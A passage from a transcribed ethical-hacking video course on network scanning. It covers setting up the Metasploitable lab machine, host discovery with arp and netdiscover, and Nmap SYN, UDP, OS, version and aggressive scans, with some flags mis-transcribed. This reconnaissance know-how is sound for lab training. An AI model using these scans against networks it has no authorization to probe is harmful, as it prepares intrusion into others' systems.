that target is vulnerable and it could be exploited. Now, the highest secured machines are the ones that have all ports closed. These are usually your home devices, such as laptops or computers that you use just for browsing online or playing video games or something. They don't need to be hosting any software since they are not a server that someone will connect to for a certain service. They're just home devices that you use. But websites, for example, must have port 80 or port 443 open since they are hosting a web page there. Also in companies, their machines could have some port open. Maybe they use that port on all their machines within that company to internally transfer files between different machines. It could be anything basically. Now, the problem occurs if that software they use on their open ports is outdated and has a vulnerability. Then our job as a hacker is to scan that machine for open ports and exploit that machine through that vulnerable software running on that open port. But the goal for now in the scanning section is only to scan the target for the open ports. Then we want to discover what software are they running on those open ports. And we want to go as deep as discovering what version of software is on that open port. Are you ready? We're going to be covering a lot in this section, And in this section we will cover one of the most important tools that a hacker must master. That tool is called Nmap. Let's dive into scanning. Welcome back. Before we proceed with scanning, I just want to give a basic overview of TCP and UDP protocol for anyone that is encountering it for the first time. We already mentioned what TCP and UDP are. They are two different protocols used for sending bits of data, or also known as packets. TCP and UDP are not the only protocols that are out there, however, they are the most widely used ones. Let's talk about TCP first. So TCP stands for Transmission Control Protocol, and it is the most commonly used protocol on the internet. When you load a web page, your computer is sending TCP packets to the web server address, asking it to send the web page to you. Then the web server responds by sending a stream of TCP packets, which your web browser stitches together to form the web page that you see. The same happens once you, for example, click on a link or sign in or post a comment. Your web browser sends TCP packets to the web server, and the server sends TCP packets back. However, TCP is not a one-way communication. The remote system sends packets back to acknowledge that it received your packets. So TCP is based on three-way handshake. And as the name says, three-way handshake is consisted out of 3 steps. First one is SYN. In this step, the client wants to establish a connection with the server, so it sends a segment with SYN, and what SYN stands for is Synchronize Sequence Number, which informs server that client wants to start communication and with what sequence number it starts the segments with. After the SYN step comes the SYN-ACK, which is the second step, and in this step the server responds to the client request with SYN-ACK signal bits set. ACK signifies the responsive segment it received, and SYN is the same from the first step. It signifies with what sequence number it is going to start the segments with. In the third and final step, which is just ACK, in this step the client acknowledges the responsive server, and they both establish a reliable connection with which they will start the actual data transfer. This is just an example of TCP communication establishing between a client and a server. Once the data transfer starts, TCP guarantees the receiver will get the packets in order by numbering them. Then the server sends messages back to the sender saying it received the messages or packets. If the sender does not get the correct response, it will resend the packets to ensure the server got the packets. All of those packets are also checked for errors. So TCP is all about reliability. Packets sent with TCP are tracked so no data is lost or corrupted in transit. That's why once you download a file, for example over the internet, your file is working once you run it in your machine, because it is being transferred with TCP, so all of the packets will reach their destination without any errors. UDP, on the other hand, stands for User Datagram Protocol. A datagram is the same thing as a packet of information, and UDP protocol works similarly to TCP, but it throws all the error checking stuff out. That's why UDP is much faster. It is used when speed is desirable and error correction is not necessary. For example, UDP is frequently used for live broadcasts and online games. That's why UDP doesn't really care whether packets received its destination, and it will not resend a packet if it didn't reach the other part. It will just continue sending other packets. You cannot ask for those missing packets again with UDP, and these are just the basics behind two most known protocols for communication. Even though many of you probably knew this already, it is good to have a refresher since we're going to need this knowledge once performing scanning. See you in the next video. Remember I told you that we must have vulnerable machines that we can scan? And before we actually proceed to performing scanning and covering different tools that we will use, let us first see where we can get a vulnerable machine and how we can install it. And trust me, it is pretty easy. So just type top 10 vulnerable machines, And you will see this Rapid7 link that says 10 places to find vulnerable machines for your lab. Click on that link. And down here, if I scroll all the way down, I should see a list of 10 different vulnerable machines that we can use as a hacker to practice our skills. And for this section, we're going to be going with the first one. So the name of it is Metasploitable. Click on it, and it will route you to another page of Rapid7 website, and it will tell you Metasploitable virtual machine to test. You can read through this if you want, as it tells you some of the information about the Metasploitable. But what's the most important part is down here. In order to download this machine, you must fill in this information. Now it is up to you what information you will fill, right here. But as soon as you fill all of this, you can click on Submit, and it will lead you to a page where you can download Metasploitable. Up here, it tells us that Metasploitable is free to use after we fill out the form. So this is something that you must do in order to download it from the official website. And after you finish downloading it, you should finish up with a file that looks something like this. So Metasploitable linux.zip. You want to extract this file. As you can see, I have already extracted it. And you should see these files right here. This VMDK file is our hard disk that we're going to use in a virtual machine. So let's see how we can install it. Go open up your VirtualBox, and we want to be creating a new virtual machine. We already know how to do that. Click on this new button right here, and it will ask us for the name of virtual machine and the operating system. You can name it anything you want. I will just name it Metasploitable 2. And the reason why I'm naming it 2 is because I already have it installed right here, so the names differ. In the type of operating system, you want to select Linux. And in the version of operating system, you want to scroll all the way down and select Other Linux 64-bit. Once you got these settings ready, click on Next. And this is what I talked about. These virtual machines will use very little hardware resources from your physical machine. That's why for this virtual machine, for the Metasploitable, we can leave 512 megabytes of RAM. It is more than enough for this machine to run. It will even work if you lower it to 256 megabytes of RAM. But 512 is recommended, so let us leave it on 512. And if you don't have this much RAM to use, you can leave it on 256. Then proceed on Next. And in this step, instead of creating a virtual hard disk now, we want to use an existing virtual hard disk. Once you select this option, click on this icon right here, and click on Add. Then find your virtual hard disk wherever you got Metasploitable downloaded. For example, I got it on my desktop, right here. Here it is, find this VMDK file, select it, and then select it right here again, and click on Choose. Once you do that, you can click on Create. And this is pretty much it. We got our Metasploitable created. All we are left to do right now are two things. The first thing is navigate to Settings, go to the Network Settings, and switch from NAT to Bridged Adapter, the same thing we did with our Kali Linux machine. Then choose your adapter and click on OK. This will just make our Metasploitable 2 IP address belong to the IP range of our network. Once you do that, click on Start. And this will start the process of installing Metasploitable for you. Unlike in Kali Linux, right here, you don't need to do anything. This will install machine on its own, and it will take about a minute or two, maybe even less. So at the end, after this finishes, it should prompt us with a login. And you will notice that this machine doesn't have a desktop or anything else, it is a command line machine. That means we can only navigate through this machine using commands. And those commands are simply terminal commands. So just picture this as one big terminal. As we can see, the installation has finished, and down here we got Metasploitable login. And if you read through this website, right here, if you read through this paragraph, it tells us right here that the Metasploitable login is msfadmin, and the password is also msfadmin. So let's try it out. Go to our machine, type msfadmin, and under password, again MSF admin. And here we are. We managed to log into our Metasploitable. Just to check our network, type ivconfig, and it will tell me that my IP address is 192.168.1.3. That is because I set it to be over bridged adapter. And if I try to ping Google, for example, it will work. So our machine is set up and it is ready to be scanned and attacked. You see, this was pretty simple to do, and in the next video we are ready to start our scanning process. See you there. Okay, so we know what scanning is. We also created our virtual machine that is vulnerable, and now we are ready to see what information can we get by scanning that machine. But before we scan a single machine to discover open ports, we must first discover what machines we got on our network. So the first part of scanning a network is to figure out how many hosts you have active and what are their IP addresses. In this case, we are going to act as if we got a task to scan our home network. And we want to discover vulnerable machines within our home network. So let's start by seeing how many hosts we got active first. There are many ways that we can go about doing this. Since I know that all the possible hosts for my network must go in range from 192.168.1.1 to 192.168.1.255. Since my IP address starts with these three first numbers, let me just type the password, and here it is, 192.168.1. This is the part that doesn't change. And to scan all 254 hosts inside of my network, I can just go and ping each and every one of them and see whether they respond to our pinging or not. If they respond, they are online. If not, they are offline. But what if I had to test more than one network? What if I had 10 more networks besides this one that I need to test? Am I about to try to ping every possible host from all those networks? Of course not. That's why we are going to use different tools to perform this much faster. Let us try with the first tool called ARP. Now, ARP is a tool in Kali Linux, but it is also a packet. ARP packets are used in discovering hosts on the network, but more about them later on once we get to the man in the middle section. For now, just remember that they are packets for discovering hosts. Before we use this ARP tool, make sure your Metasploitable is started up. And in case you got some other devices that you can connect to the internet, connect them just so we can get various output and try to figure out which IP address belongs to which host. Now, our ARP tool works based on those ARP packets that I mentioned. So if I type ARP --help and press enter, it will tell me command not found. Now this is because I must run the tool with sudo privileges. So sudo ARP --help, and here is the tool. It doesn't have too many options. We got -a, which displays all hosts in alternative BSD style, -e, display all hosts in default Linux style, and these options down here are not something that we're interested in. All we want to do is use this -a option. So if I go down here, clear the screen, and type sudo ARP-a, it will tell me it only discovered my router. But why is that? I got my Metasploitable running, also got my laptop running, so it should be discovering other hosts as well. Sometimes we must ping a host first before it appears right here, since this information is being read from our ARP tables. So if I, for example, try to ping my Metasploitable, it will get responses back, and if I run ARP-a again, now we will see that we got an entry for the Metasploitable inside of our ARP tables. So this tool doesn't seem to be that good for discovering hosts. Sometimes it will have all the hosts available since you already communicated with them before, but sometimes it seems that we must ping the host first before it shows them. That's why a much better option is a tool called netdiscover. To run netdiscover, we can simply type sudo netdiscover inside of your terminal, press enter, and this tool will find all of the available devices on your network on its own. You don't have to ping anything, you don't have to communicate with anything, you can just leave this tool to run and it will find all the devices on your network. So right here it managed to find 5 of them. We can see up here that it is still scanning, and it is just scanning different subnets, so it already finished mine, and you can control C this if you already see the result, since this will scan all the usual subnets that occur in a network. Right here we see that we captured 5 ARP packets, and there are ARP requests and ARP replies, but once again more about that later. This just means that we managed to discover 5 hosts using these packets, and these are those 5 hosts. Let me control C this, since it won't really manage to find any more hosts. And right here we got their IP addresses, their MAC addresses, and their MAC vendor name or host name. So right here, I know that this is my Metasploitable, which is this one. This 192.168.1.7 is my host machine or my physical machine that I'm running my Kali Linux on. These 2 down here are 2 laptops, I believe. And this right here is my router. And how do I know that this is my router? Well, usually routers start with the first number. Either it will be something like .0 or .1. And just so you can be sure which IP address is your router, you can type the command netstat-nr, and under this gateway column, we should see the IP address of the router. So you can see they do match. The next step would be to go about scanning each and every one of them. And for this, we're going to be scanning our Metasploitable, and you can also scan your home machines just for even more practice. See you in the next video. It is time to start with the first big tool that is essential for ethical hackers. That tool is called Nmap. We're going to cover a lot of things inside of it, and unlike all the other tools that we covered by now, which you might or might not use in penetration tests, this is a tool that you will almost always use without any doubt. So what is Nmap? Nmap is a network mapper. It is a free and open source network scanner, and it is used to discover hosts and services on a computer network by sending packets and analyzing responses. It has a lot of different options, and we're going to check them out in the next few videos. For now, let us just see how we can start Nmap and run a basic scan. First thing, make sure your Metasploitable is up and running, and also if you got any other devices in your home network, turn them on just so we can scan them as well. Okay, let us see how we can run Nmap and what options do we get with Nmap. Just like all the other tools, we can get the Nmap help menu by only specifying Nmap in terminal or specifying Nmap --help. And you will see right away we get a lot of options right here. And this right here is just a short help menu. We will see the longer menu once we start experimenting with these options right here. But for now, we're only interested in running Nmap with just a basic scan. So for basic scan, all we need to do is specify an IP address. If we go to the help menu and you scroll all the way to the top, we should see target specification right here. It tells us that we can provide a host name, an IP address, or a network for scanning. And below that we got some of the examples of what we can specify with Nmap and what is the syntax for specifying hosts. We can also read our targets from a list by specifying option -il. And if we want, we can exclude some hosts that we don't want to scan by specifying --exclude option. For the first time, let us get an IP address from our Metasploitable and let's scan it to see what results we get for scanning one IP address. We already saw how we can get Metasploitable IP address. You can either run netdiscover to see all the online hosts, or if you don't want to bother, you can just go to Metasploitable right here and type ifconfig. I can see that the IP address of my Metasploitable is 192.168.1.6, so that is the IP address that I will use. Let's run our first Nmap scan. If I type Nmap and just 192.168.1.6 and press enter, wow, this finished pretty fast. But don't get used to it, the only reason that this scan finished so fast is because the target is on my home network. True Nmap scans can sometimes take hours to finish, depending on where your target is, how many ports they have open, are they protected by firewall, and many other things that we are also going to cover. But for now, this is the response for our Metasploitable with our basic scan. So it tells us that host is up, it tells us which open ports it has, we get the exact number of which ports are open on the target machine, and right here we can notice that there are a lot of ports that are open. That is because Metasploitable is running a lot of services. Nmap also tells you, besides the port that is opened, which service is running on that open port, and this is this third column. So we can see that port 21 is open and it is running FTP, which we already know that it's file transfer protocol. We got port 22 to be open, and that port is for secure shell. We got port 80 that is opened, and that is an HTTP port, and this could mean that our Metasploitable could be hosting a web page. We can check this out if we type the IP address of our Metasploitable inside of our Firefox. So let's go up here, open up our Firefox. And if I go up here and type 192.168.1.6, press enter, this will automatically go and try to connect to the port 80, and indeed it is hosting a web page. But more about this web page later on in the course, as it holds a bunch of vulnerabilities which we will cover. For now, let us just see what other things we got with our Nmap. So besides these known ports that we got right here, we also discovered a bunch of other ports hosting different services, and some of them could be vulnerable. We also see this right here that says not shown 977 close ports. But wait a second, I said that there are over 65,000 ports. Why does it say that it didn't show only 977 ports? Or it shows that only 977 ports are closed. That is because Nmap by default scans most known 1000 ports. It doesn't scan all 65,000. We can tell it to scan all 65,000, which we will see later on, but in most cases it is not necessary. Okay, cool. Our first Nmap scan gave us some results. And all of these results from our scans you would write down in a report in a real penetration test. Now that we know how we can scan one IP address, let us see how we can scan a range of IP addresses. Let's say we want to scan our entire network, and for this once again you must know your subnet of your network or your network's IP range. We talked about this earlier. For me it is from 192.168.1.1 up to 192.168.1.255. So we can specify this in two different ways. We can type nmap 192.168.1.1-255, or we can type it like this, 192.168.1.1/24. And if you're new to subnetting, you can think of this /24 as something that says first 3 octets are not changeable. And by first 3 octets I mean first 3 numbers, which leaves us with only last octet or last number that will be changeable inside of our IP range. So let's scan it. If I press enter. Now this scan right here might take a little bit more time, since it is not only scanning one host, it is scanning multiple hosts. And even though it's scanning multiple hosts, it finished relatively fast because it is scanning my own network. Let us read the results. So these right here are the results for the Metasploitable, as we can see by the IP address, and we got the same results as before, which ports are open and what services are they running. Down here we get that it scanned 256 IP addresses and 3 hosts are up. Let's see what other 2 hosts are up besides our Metasploitable. We got a device with the IP address of 192.168.1.4, and it says right here all 1000 scanned ports on this device are closed. And you remember when I told you that this is the more secure version, since right now we cannot connect to any one of these ports. And this is probably some home device, possibly my laptop. It has all 1000 scanned ports closed because it doesn't host any service to other machines. And the last device that we got is my router. We got its IP address and we also got which ports it has open. So it has port 22 for SSH, port 23 for Telnet, port 53 for the domain, port 80 and port 443 for HTTP and HTTPS, and this port right here that says service unknown. This is because Nmap couldn't figure out what service is running on this open port. Okay, great. For now we performed basic Nmap scan without adding any additional options to it. And with this, we managed to discover open ports on our target machines. That is good for the start. In the next video, we will see what else can we discover using Nmap and what other cool options it has. It is time we discuss different scan types that we can do with Nmap. Now, Nmap is a huge tool, and it offers many different types of scans that we can perform, and we will be covering just some since there are a lot of them. However, at the end of this video, I will give you a really good tip as to how you can really master the Nmap tool. Talking about different scans doesn't necessarily mean that we will get different results. Matter of fact, many of these different scans will give us the same result. And in this video, I'm going to explain exactly what the differences are between certain scans. To fully understand this, you will need a background knowledge on TCP and UDP. So, in case you didn't watch the short video I made on TCP and UDP, make sure to watch it before covering this. Let's start with the first type of scan, and that scan is called TCP SYN scan. Let me open the terminal. The command that we must run is nmap-ss, and then we're going to be scanning Metasploitable in this video, since that is the machine that we are attacking. So the IP address of my Metasploitable is 192.168.1.6, and this -ss is TCP SYN scan. SYN scan is probably the most popular scan in Nmap. It can be performed quickly, scanning thousands of ports per second on networks that aren't protected by a firewall. And the reason why it is called a SYN scan is because it never really opens a full TCP connection. You only perform the first step of three-way handshake, which is sending SYN. And the way it works is, if the target sends SYN-ACK back for a certain port, that indicates that that port is listening or it is open. Target can also send something called RST, which stands for reset, which would indicate that the port is closed. In case it doesn't give any response back after several tries, port will be marked as filtered. And filtered is just another state of ports that happens once Nmap cannot determine whether a certain port is open or closed. The filtered state could happen if port is, for example, protected by some filtering or a firewall. And now that we know exactly how TCP SYN scan works, let's test it out on our Metasploitable. There is one thing with this command. If I try to run it, it will not work. It will tell me, you requested a scan type which requires root privileges. And the reason this requires root privileges is because we're only sending one part of three-way handshake and telling our machine that we do not want to respond to a SYN-ACK bitset in case it is sent back from the target. That requires root privileges. So we must run this with sudo nmap-ss, and then let's type in our password. And we will notice it gives us the results of ports that are open very fast. And it is also very important and satisfying once we know how certain scan type works. Once again, it sends only the SYN and waits for a SYN-ACK or RST, and it never establishes a full TCP connection. Let us check out the result. So we got these ports open, and we also got what service is running on those open ports. Now, here's the time that it took, and we're going to compare this with different scans. And the reason it finished this fast is, once again, it doesn't establish a connection. Compared to this SYN scan that we just performed, we also got something called TCP connect scan, or also labeled as -st. So in order to run this, we can just change this command from -ss to -st. And you will see all of these options if you run the help menu of Nmap. What's interesting about this is that it does not require sudo privileges. And the reason it does not require is because it performs a normal TCP three-way handshake connection. So the only difference between this and previous scan is that TCP connect scan establishes a full connection. the important part here that you should remember is that this scan will leave much more trace that you performed an Nmap scan on the target machine, and it is easily detected. That's why once you can run Nmap as root, usually synscan will be a better option than the TCP connect scan. Nonetheless, let's test this one out so we can remove sudo, as it does not require root privileges. And you will see it also finishes relatively fast. The output will be exactly the same as with the synscan, but sometimes it could take a little bit longer than the synscan since it is performing a full TCP connection. And even though we got the exact same result, which are just the open ports and the services that they run, now we know how both of these scans work. And now you know that, for example, this scan is much more detectable than the synscan. Or you can say that it just makes more noise on target machine. The last scan that we're going to cover, and keep in mind these are just some of the scans, and I will show you where you can find the rest of them and possibly test them out if you want to. But the next scan that I'm going to cover is pretty unpopular, and that is the -SU scan, or also known as UDP scan. The reason why it's unpopular is because many services on the internet run over TCP protocol, as we already know. Since UDP scanning is much slower than TCP scanning and more difficult, sometimes when people are developing security for their ports, they ignore the UDP ports. And this results in a mistake, as there are a lot of exploitable UDP services, and we should never ignore this scan just because it takes time. Let us test it out. This also will require sudo privileges, so let us type sudo nmap-su for the UDP scan and specify the IP address of Metasploitable. You will notice this scan will take time. You can check at how much percent it is currently at by pressing the upper arrow key. So if I press upper arrow key, down here it will tell me it is currently at 3%. And I'm just going to leave this running while I show you the cool tip for the Nmap. So remember this, the key to learning Nmap in great details is not in reading its help menu, but in reading its manual. And to open the Nmap manual, you can open your terminal and type manual Nmap. And let me do this in a second terminal. So I will open it up, type man, and then Nmap. This man right here is shortened for manual. Press enter. In this file, it explains every Nmap option in great detail. Let us find different scan types that also exist, since we didn't really cover every one of them. Let's scroll all the way down to different Nmap scans. And as we're scrolling, you will see that we are passing the actual help menu that we get outputted once we run the -- help. And below this help menu, it explains every option in great details. And as I'm scrolling, I came to this part, which says port scanning basics, and here are the 6 port states recognized by Nmap. And this is good to read, so we got the open port state, the closed port state, we got filtered port state, unfiltered port state, open and filtered, and closed and filtered. So if you want, read through this. It is really useful knowing once you get, for example, filtered ports, to know exactly what that means. And if I go a little bit more down, here they are. Here are the different scan types that Nmap has. So here is the TCP synscan that we performed, which is -SS. Here is the -SD, which is full TCP connection scan. And down here you will notice after the UDP scan that we got different options as to how we can perform our scan. And you can read about each and every one of them and see when are they useful and how you can specify them. Here is the TCP ACK scan, here's the TCP window scan, and you will see there are a lot of them. There are also different options such as this scan flags, which is custom TCP scan, but this is an advanced option and we might take a look at this later on. Here is idle scan, echo scan. Let's see all the way down, IP protocol scan, FTP relay host, FTP bound scan, and that would pretty much be it for the Nmap scans. So depending on your target and what you exactly want to get from this scan, you would pick one of them. So for example, if you wanted to discover open ports, you would use the TCP/SYN scan. Now, the ACK-scan, I believe, which is the -SA, which we saw a few seconds ago, is useful, I believe, to mapping out the firewall. Just read through them if you have time, and you will discover how they work and when are they useful. So let's see how much percentage our UDP scan is at. So it has finished about a third of the scan, and we know that this will take at least 10 to 15 more minutes, so we're not going to wait this. And by the way, about the Nmap manual, you don't need to read that entire file, just it is good to know that it exists. So sometimes when you forget something or you want to check out if Nmap has some other option that you need, you can just open that manual and read until you find what you need. Nobody expects you to know everything inside of that file, but after some time you will start picking some of the commands up and memorizing them. Cool. We covered a lot in this video. The next two videos will be even more important. We're going to check how we can discover operating systems that our target machines run and what versions of services are they running on an open port. Which is, remember, one of the most important things that we want to find. Let us check out how we can figure out what operating system is our target running just by scanning it with Nmap. In Nmap, this feature is quite popular, as they have a database of thousands of known operating system fingerprints that they compare with the host that you scan in order to find out what operating system is it running. But for this to work, a target machine must have at least one port open and one port closed, which we need not to worry about since our Metasploitable has both open and closed ports. However, it could not work for some other targets. What I'm going to do in this video is I'm going to try to scan my Metasploitable, which is running Linux, and then I will try to scan my Windows 7 virtual machine that I got right here, and I will try to scan my Windows 10 host machine. And let us see what results can we get. Let's see whether Nmap can figure out what operating systems are they running. If I go back to my Kali Linux, and let's go with Metasploitable first. To run the operating system feature, we must use sudo, and after Nmap we specify -o for discovery of operating system. Then we specify the IP address, and if I specify the IP address of my Metasploitable first, press enter, type in my password. It will take just a few seconds, and down in the results we can see the OS testing. It tells us right here that Metasploitable is running Linux. And down here in the OS details it tells us which version exactly is it running and how many hops is the target distance from us. It says 1, which means host is inside of our network. And besides all of this, it also tells us that the machine that we are scanning is a virtual machine, as we can see right here. It managed to figure this out by the MAC address that Metasploitable has, since VirtualBox machines have MAC addresses that start the same, and these are these three first numbers. This is really interesting because it can sometimes help us to realize that our target is an actual virtual machine and not a physical machine, which could possibly indicate that we're scanning a honeypot, which is usually a purposely vulnerable virtual environment that is used to lure in hackers in order to find out whether they're being attacked. This is because usually an attacker will go for the most vulnerable machine first, and that's how they catch him. That vulnerable machine could possibly be put there on purpose. So for our Metasploitable, we got the correct result. It tells us that it is running Linux, which is correct. Down here it even tells us which version of Linux is it running. And we can also see right here by the MAC address that this is a virtual machine. So we got a lot of useful results for Metasploitable. Let's try with my Windows 10 physical machine. So if I type sudo nmap -o, and to scan my physical machine, I must check the IP address inside of my command prompt. If I type ipconfig, it will tell me that my IP address is 192.168.1.7. Let us type it in, 192.168.1.7. And run this scan. It should also take just a few seconds. Once again, you can check at what percentage is it at by pressing the upper arrow key, and it is currently 81% done, so let's just wait for the remaining few seconds to finish. And it will tell me right here that it didn't manage to discover OS details. Now why is that? Well, because we can see right here all 1000 scanned ports are either closed or filtered. And remember, to discover an operating system, we need at least one open port and one closed port. In this case, there is really nothing that we can do to discover operating system with Nmap, since all ports seem to be filtered. Let's try the same of Windows 7 virtual machine. I know for a fact that the Windows 7 virtual machine has one port open, so let's see whether it will manage to figure out the operating system on that machine. If I type sudo nmap-o, and I already typed ipconfig in my Windows 7, the IP address is 192.168.1.14. Let's specify it right here. Let's wait for this to finish. And it gives us a bunch of OS details. Up here we have a warning that says, results may be unreliable because we could not find at least one open port and one closed port. It did manage to, however, find one open port, which is this port 445, but all the other ports are filtered. However, based on this one open port, it tried to guess what operating system it has, and it was relatively close. It managed to guess that the operating system is Windows, and sometimes this could be enough for us. We can see right here it specified Windows 7, which is correct, but it also specified Windows Vista and Windows 2008, which are incorrect guesses. So we can say that it managed to narrow it down for us, but it didn't really hit the correct one. So we checked how to figure out what operating system is the target running. We noticed that it doesn't always work, but this information, with the information which we will get in the next video, will be more than enough for us to be able to conduct a vulnerability analysis. Let us see in the next video how to get exact version of services running on open ports. Welcome back. Let us finally check out how we can figure out the version of software running on an open port. For now, we managed to discover open ports. We also learned what different scans do and which ones are better to use. And we learned how we can identify an operating system on some of the targets that we scan. Now, let's see one of the most important parts that will also help us in identifying vulnerabilities. So, why do we care about versions of software so much? For example, I might somehow find out that Metasploitable is running Apache web server on port 80. But that doesn't narrow all the possible attacks too much. Of course, it narrows it down to only search for Apache vulnerabilities, but Nmap can even go as far as discovering what exact version of Apache is it running. Then, after knowing the version, we can search that version on internet and try to see whether there are any known vulnerabilities for that specific version. So version discovery helps us a lot. And let's see how we can perform it. To perform version discovery, we use the option -sv. So I will run the command nmap -sv, and as usual, we're going to be scanning our Metasploitable. Now, this command also requires sudo privileges, so make sure to type it at the beginning of the command. Sudo nmap -sv, and then the IP address. Press enter, enter the password. This particular scan could take longer than other scans, because right now we are deeply scanning the target. Let us check out at what percentage is it at. So 91%, it should finish in just a few seconds. Let's wait for it. And here it is. We can see we got a bunch of result right here. The new thing that we got from all the previous scans is this fourth column. Remember, once we scanned previously, we only got these first three columns, which are the port number, the state of the port, and the servers that it is running. Right now, we also get the version of the service. So let's go quickly through this. We got port 21, which is FTP, and right here we got the exact version of what type of FTP software does it have. For the SSH, we get the same thing, so the version of SSH is OpenSSH 4.7, Debian Ubuntu. We got the Telnet, the SMTP, the HTTP, we got that it is running the Apache HTTP 2.2.8. For the SMB protocol, which is port 445 and 139, we got that it is running Samba from the 3 point something to 4 point something. In this range will be the version that it is running. What we would do with this information, as I already mentioned, is we would just try to search for some known vulnerabilities for the specified versions. For example, if this Apache version right here has a known vulnerability, we would discover it by pasting this in Google and typing vulnerabilities. And whatever comes up, we would test this on this target and see whether it works or not. Since some vulnerabilities could be patched. We never know, so we want to try it out. Down here we also got the versions for the other ports, so we get a bunch of results right here. What you would do with this scan, since this is really useful, we would type this on a report and we would use for the future references. For now, let me show you another option that you can use with the version scan, and that option is intensity of scanning versions. We can type it like this. So if I use the same command, let me just clear the screen so we can see it better. If I use the same command and after -sv I type -- version -intensity, and after the version intensity we need to specify how high we want the intensity to be, and it can be set between 0 and 9. The default one, which we used in the last scan, is 7, so every time you don't specify this option it will be 7 by default. If we set it all the way up to 9, then we will have higher possibility of identifying the correct service version. However, in 99% of Nmap scans, this option is not needed. You can just leave it on default, which is 7. If you set it at 9, it will take longer time, and since we're scanning a target that is on our own network, it will still do it in just a few seconds or minutes. But if you were to scan a real target, Nmap scans could take a lot more time to accomplish. So you always want to consider not only performing most accurate scan possible, but also performing a scan that will be equally fast and accurate. So sometimes we have to lose one thing in order to gain the other. That would be pretty much all for the version scanning. Now, we're not going to be running this command since I can tell you right now that it will give us the same output as the previous one. So in this case, increasing the version intensity won't help us too much. And as far as these options go, there are more options for the version discovery that you can check out inside of the Nmap manual. But before I end this video, I want to show you another thing that I also use a lot, and that is the -a option. So let me show you right here. If instead of all of this, I specify -a, and -a is so-called aggressive option. It enables some advanced features of Nmap. Those advanced features are, well, first it enables OS detection without specifying the -o that we already covered. It also enables the version detection without specifying the -sv, and it enables something called Nmap script scanning. What Nmap scripts are something that we will cover shortly. For now, just remember that -a enables all of those things that we covered in the previous videos, including Nmap scripts. And since -a is one of the more aggressive Nmap options, please do not try this on targets that you do not have permission to scan. However, let us test it out on our Metasploitable target, and if you want, you can also try to scan your home network with it. Just keep in mind that since it is using all of these options, it will take some time, even if it is scanning our home network. So, if I run this command, this will take some time. If I press upper arrow, it is 78% done. And the output of this option we're going to see in the next video, as well as some other useful things that we can do with Nmap. As soon as we check that, we are going to get into firewall evasion using Nmap. See you there. By now, if you covered all of the Nmap videos that we did, you should have an intermediate knowledge of Nmap. All we are left to do to check out is just some of the few options that you might find useful once you're performing your scans, which we will check out in this video. And after it, we need to check out two more things. One of them is running Nmap with scripts, which part of it we're going to see right now with the results of our -A scan from the previous video. And the second thing is how we can bypass firewall, IDS and IPS using Nmap. So for now we only noticed how we can perform different scans, but we never really talked about what if our target is well secured, what if they have a firewall. We want to perform our scans as quietly as possible in order for us to not get detected. But before we jump into all of that, let us check out the output of our -A option. Remember from the previous video, -A runs a bunch of different things such as OS detection, version scan, and it also runs something called Nmap scripts. You will see down here that we are getting output that we didn't get before. So besides the open port and the version that the open port is running, we also get the output of different scripts that are running on the target as we execute this scan. So right now, here we can see that it executed the script for FTP anonymous login, and it says that it is allowed. And we will check out what the FTP anonymous login is. For now on, I can tell you that it is not really that secure. Even though if we go all the way down, here it says FTPD 2.3.4, which is this version that the target has, is secure, fast and stable. And I can assure you this is one big lie, as this FTP version is vulnerable. And we're going to see in the exploitation section how we can exploit this and gain access to our target machine. Down here we also get the enumeration of the SSH, so we get the SSH host key, nothing really too useful for us, the SMTP commands that are allowed, the SSL ciphers right here. We also get the HTTP server's header, the HTTP title, and these are just some additional information that we got from running scripts. If I go all the way down, we also get information for some other open ports. And down here, we will see that our scan also performed the SMB enumeration. So we got the computer name, NetBIOS computer name, domain name, SMB security mode. Down here, we also get the trace route to this target's IP address. And this is the one hop that we have since it is in our own network. It tells us down here that it also performed the OS and service detection, and here is the OS detection, but we already saw this. We got Linux running. So this is just some additional information on top of the information that we already had. But remember, -A is an aggressive scan. It does give us the most output out of any other options, but it is also pretty aggressive and easily detectable if target has some security measures. Since our Metasploitable doesn't have any security measures or is not behind any firewall, this scan is best for targets like that. So we got the most information using -A. But besides this -A, let us also check a few more useful options that Nmap gives us. And to do that, we're going to run the Nmap manual. So type man and then Nmap, and it will open up the manual once again. We already know how we can go through it with upper and lower arrow. And we're going to just go really quick through it and see whether there are any useful options that we haven't covered, but that you might want to use. So if we go down here, this -SN option is really useful option. And it is not really useful for discovering vulnerabilities or open ports. Matter of fact, this option right here performs the same thing that our NetDiscover tool did. Remember, we use NetDiscover to locate all of the hosts that are up and running on our network, and -SN pretty much does the same thing. As we can see right here, this option tells Nmap not to do a port scan, so you will not find out any open ports with this scan. The only useful thing we get from this is which hosts are up and running. So let's test it out real quick. And this is a scan that you would use probably on multiple machines to discover which ones are up and which ones aren't, but you can also use it on one machine if you'd like. For this scan, I will use my home network, so -SN and then 192.168.1.1-255. If I press enter, this should pretty much in just a few seconds, and here it is, it will give us which hosts are currently up. We get their IP addresses, so 192.168.1.10, this is my laptop. We get the Metasploitable, we get Windows 10 probably, and we get my router. So instead of netdiscover, you can use this to figure out which hosts are up. But for me personally, I like netdiscover output a little bit better than this one. This right here looks a little bit messy. Okay, so the second thing that I want to show you is -p option. And this is an actual option that you will use a lot. So for this, we're going to scan our Metasploitable, so change the IP address to the Metasploitable IP address. And what -p option is simply you can specify what range of port you want to scan with Nmap. So remember, when we perform any other scan, it scans top 1000 ports. But what if we, for example, only wanted to scan one port? For example, let's say we wanted to scan port 80 on the Metasploitable. Can we do that? Well, if you specify -p and then 80, and then the IP address, here it will tell us port 80 open and service that it is running. So we can scan only one port if we want. This option is useful if you're only attacking one port and you don't want to bother really and let Nmap scan 1000 port when you only want to enumerate one single port. You can also do it on multiple ports, for example, port 80, port 22, port 100, and let's see what the output is. And here we can see port 80 and port 22 are open, while the port 100 is closed. We separate different ports with comma, and instead of separating them with comma, if you want to scan a range of ports, you can also do this. You can do port 1 to port 100. And here are the results. Not shown, 94 closed ports, and we got 6 ports that are open in first 100 ports. And remember when I told you that there are over 65,000 ports? Well, this is the option that we can use in order to scan all 65,000. If I type the same command, just I scan from 1 to 65,535 and press enter, this scan will take longer than any previous scan that we did, since it is scanning 65,000 ports. Here we can see the output, it finished in 7.74 seconds, and here are all the open ports that it managed to discover. Here are some of the ports that we never really discovered with previous scans that we did in last few videos. So this is really useful. If we used regular scans and we only scanned first 1000 ports, we would never really know that these ports are also open. Now, on the contrary, instead of scanning 1000 ports or 65,000 ports, we can use a cool option, which is -f, and it is capital F. And what this option does is, instead of scanning 1000 ports, it scans first 100 ports. So in case you want to perform a quicker scan, and you also want to scan top 100 used ports, you would use the -f option. If I press enter, you can see it finished in less than 1 second, and it 